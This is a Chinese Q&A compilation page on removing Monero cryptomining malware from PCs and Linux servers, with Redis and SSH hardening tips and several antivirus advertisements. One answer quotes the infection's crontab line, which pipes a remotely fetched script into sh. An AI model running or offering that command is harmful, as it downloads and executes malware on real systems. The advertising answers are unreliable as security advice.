xmr挖礦病毒

㈠ 門羅幣挖礦病毒，怎麼查殺

可以安裝一些殺毒軟體在電腦上 如360安全衛士一類的，然後一直保持開啟 這樣就可以預防病毒進入到電腦當中了，如果已經中毒在安全模式裡面使用360急救箱查收。

㈡ 電腦被xmr-eu2.nanopool.org:14433佔用資源是怎麼回事

在(2)這個進程上右鍵，打開文件位置，看看能不能找到這個(2).exe的程序文件。如果能的話，就在任務管理器右鍵結束進程，然後刪除這個(2)的文件。
建議不要關閉防火牆、defender等自帶殺毒軟體。也不要關閉windows的訪問通知許可權。這樣就不會被這些奇怪的病毒或垃圾程序困擾。

㈢ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

㈣ 為啥XMR的挖坑軟體都被殺毒軟體幹掉

是否不安全，試試騰訊電腦管家查殺，在雲查殺引擎中，電腦管家首次啟用了微特徵技術。微特徵技術極大的提高雲查殺引擎對最新病毒的反應速度，增強了雲查殺引擎應對復雜病毒時的能力。以往傳統的雲查殺引擎相當於收集了所有病毒犯罪分子的照片，雖然可以通過照片准確的比對出犯罪分子，但是只要犯罪分子換一身衣服，或者化化妝，傳統的雲引擎就需要重新再次收集信息識別。

㈤ 如何防範門羅幣挖礦病毒

要用360來保護自己的電腦，和在全國在最大數字資產中幣平台管理自己的門羅幣比較放心安全

㈥ Linux系統被Carbon挖礦病毒入侵，殺掉之後過一段時間又起來了，有誰遇到過這種情況啊

這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後，使用裡面的病毒查殺功能，直接就可以查殺這種電腦病毒了

㈦ 為什麼挖礦病毒（木馬）多數挖門羅幣

試試騰訊電腦管家查殺，殺毒管理2合1，木馬查殺升級為專業殺毒，查殺更徹底；集成金山雲查殺引擎、小紅傘本地查殺引擎電腦管家自身反病毒引擎，全面保障病毒查殺效果。加上電腦管家系統修復引擎，當檢測出系統問題的時候，還能幫助用戶修復系統。

㈧ 筆記本老顯示monero(xmr )cpu miner已停止工作什麼意思

這個和系統的svchost.exe很像，刪除過後一直自動新建出來。
一開始沒找到問題之前做了一個任務，每1分鍾用taskkill刪除這個進行，先緩解一下，然後系統運行的每一個進行都用打開文件位置的方式來確定，找到了一個TEMP文件夾裡面的文件，刪除掉，另外那個程序就不會再新建出來了。

㈨ 電腦中了挖坑病毒，xmr這個軟體不斷重裝，無法徹底刪除，怎麼辦急

如果實在弄不了，這個就重新找個官方純凈系統安裝包重裝系統去了。